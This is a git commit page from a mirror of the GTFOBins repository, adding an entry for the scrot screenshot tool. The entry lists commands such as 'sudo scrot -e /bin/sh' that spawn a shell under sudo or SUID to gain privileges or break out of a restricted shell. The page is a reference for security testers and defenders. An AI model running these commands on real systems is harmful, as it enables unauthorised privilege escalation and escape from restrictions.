mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add scrot
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
885c506d00
commit
887384bc2f
10
_gtfobins/scrot.md
Normal file
10
_gtfobins/scrot.md
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
---
|
||||||
|
description: This requires a running X server.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: scrot -e /bin/sh
|
||||||
|
limited-suid:
|
||||||
|
- code: ./scrot -e /bin/sh
|
||||||
|
sudo:
|
||||||
|
- code: sudo scrot -e /bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user